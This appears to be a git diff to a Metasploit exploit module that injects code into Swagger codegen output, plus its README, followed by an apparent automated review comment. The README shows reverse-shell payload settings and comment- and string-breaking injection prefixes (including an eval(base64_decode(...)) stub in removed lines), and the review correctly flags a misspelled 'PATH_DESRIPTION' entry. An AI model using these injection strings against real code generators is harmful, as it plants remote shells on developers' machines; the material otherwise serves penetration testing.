diff --git a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/README.md b/documentation/modules/exploit/multi/fileformat/swagger_param_inject/README.md
old mode 100644
new mode 100755
index da9947f840..280d7bdf75
--- a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/README.md
+++ b/documentation/modules/exploit/multi/fileformat/swagger_param_inject/README.md
@@ -21,7 +21,7 @@ set LPORT 4444
 run
 ```
-3. Pick a target
+3. Pick a target
 ## Targets
@@ -32,70 +32,18 @@ This attack looks to inject a payload into javascript by terminating a URL path
 [nodejs-codegen](nodejs-codegen.rc)
 ```
-set PAYLOAD nodejs/shell_reverse_tcp
+set PAYLOAD nodejs/shell_reverse_tcp
 use exploit/multi/fileformat/swagger_param_inject
 set INFO_VERSION "1.0.0"
 set PAYLOAD_LOC "PATH"
 set PAYLOAD_PREFIX "/a');};};return exports;}));"
 set PAYLOAD_SUFFIX "(function(){}(this,function(){a=function(){b=function(){new Array('"
-
+set SWAGGER_HOST "localhost"
 run
 ```
-**PHP**
-
-This attack takes advantage of injection of variables into multiline comment area.
-
-[php-codegen](php-codegen.rc)
-
-```
-set PAYLOAD php/meterpreter/reverse_tcp
-
-use exploit/multi/fileformat/swagger_param_inject
-
-set PAYLOAD_PREFIX "*/ namespace foobar; eval(base64_decode('"
-set PAYLOAD_SUFFIX "')); /*"
-
-run
-```
-
-
-**Ruby**
-
-This attack takes advantage of injection of variables into multiline comment area.
-
-[ruby-codegen](ruby-codegen.rc)
-
-```
-set PAYLOAD ruby/shell_reverse_tcp
-
-use exploit/multi/fileformat/swagger_param_inject
-
-set PAYLOAD_LOC "INFO_TITLE"
-set PAYLOAD_PREFIX "=end "
-set INFO_DESCRIPTION "=begin "
-
-run
-```
-
-**Java**
-
-This attack looks to inject a payload into javascript by terminating a URL path string, and placing code inline without causing runtime errors.
-
-[java-codegen](java-codegen.rc)
-
-```
-set PAYLOAD java/jsp_shell_reverse_tcp
-
-use exploit/multi/fileformat/swagger_param_inject
-
-set PAYLOAD_LOC "PATH"
-set PAYLOAD_PREFIX "a\\\"; "
-
-run
-```
 ## Quick Test
diff --git a/modules/exploits/multi/fileformat/swagger_param_inject.rb b/modules/exploits/multi/fileformat/swagger_param_inject.rb
old mode 100644
new mode 100755
index abfe975cd8..f8bdc91882
--- a/modules/exploits/multi/fileformat/swagger_param_inject.rb
+++ b/modules/exploits/multi/fileformat/swagger_param_inject.rb
@@ -50,15 +50,14 @@ class MetasploitModule < Msf::Exploit::Remote
 [
 OptAddress.new('LHOST', [true, 'Server IP or hostname that the swagger codegen will callback to.']),
 OptPort.new('LPORT', [true, 'Server port.']),
-OptString.new('PAYLOAD', [false, 'Payload Injection']),
 OptString.new('PAYLOAD_PREFIX', [false, 'Payload Injection prefix', '']),
 OptString.new('PAYLOAD_SUFFIX', [false, 'Payload Injection suffix', '']),
-OptString.new('PAYLOAD_LOC', [false, 'Payload insertion point','INFO_DESCRIPTION']),
+OptString.new('PAYLOAD_LOC', [false, 'Payload insertion point', 'INFO_DESCRIPTION', ['INFO_DESCRIPTION', 'INFO_VERSION', 'INFO_TITLE', 'SWAGGER_HOST', 'BASE_PATH', 'PATH', 'PATH_DESRIPTION', 'PATH_RESPONSE_DESCRIPTION', 'DEFINITION_DESCRIPTION'] ]),
 OptString.new('INFO_DESCRIPTION', [true, 'Swagger info description', 'A']),
 OptString.new('INFO_VERSION', [true, 'Swagger info version.', 'B']),
 OptString.new('INFO_TITLE', [true, 'Swagger info title.', 'C']),
 OptEnum.new('SWAGGER_SCHEME', [true, 'Protocol scheme', 'http', ['http','https','ws','wss']]),
-OptString.new('SWAGGER_HOST', [true, 'a valid hostname or IPv4', 'X.Y.Z.xyz']),
+OptString.new('SWAGGER_HOST', [true, 'a valid hostname or IPv4']),
 OptString.new('BASE_PATH', [true, 'The root path of API on host.', '/']),
 OptString.new('PATH', [true, 'Path of request/response on root path.', '/a']),
 OptString.new('PATH_DESCRIPTION', [true, 'Description of a path request object', 'D']),
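Review bot: The new allowed-value list for `PAYLOAD_LOC` spells one entry `'PATH_DESRIPTION'`, while the option it is meant to name is registered as `PATH_DESCRIPTION` a few lines below in the same hunk, so a user who selects the path description as the insertion point is refused and the accepted spelling matches no option; change the entry to `'PATH_DESCRIPTION'`. The same line puts the fixed value set into an `OptString`, whereas the adjacent `SWAGGER_SCHEME` option expresses its fixed set with `OptEnum`; using `OptEnum.new('PAYLOAD_LOC', [false, 'Payload insertion point', 'INFO_DESCRIPTION', [...]])` keeps the two declarations consistent and makes the option type itself enforce the list, rather than relying on the string option honouring a fourth array element (which I have not verified here). The enclosing options array opens on the `[` context line and continues past the end of the hunk.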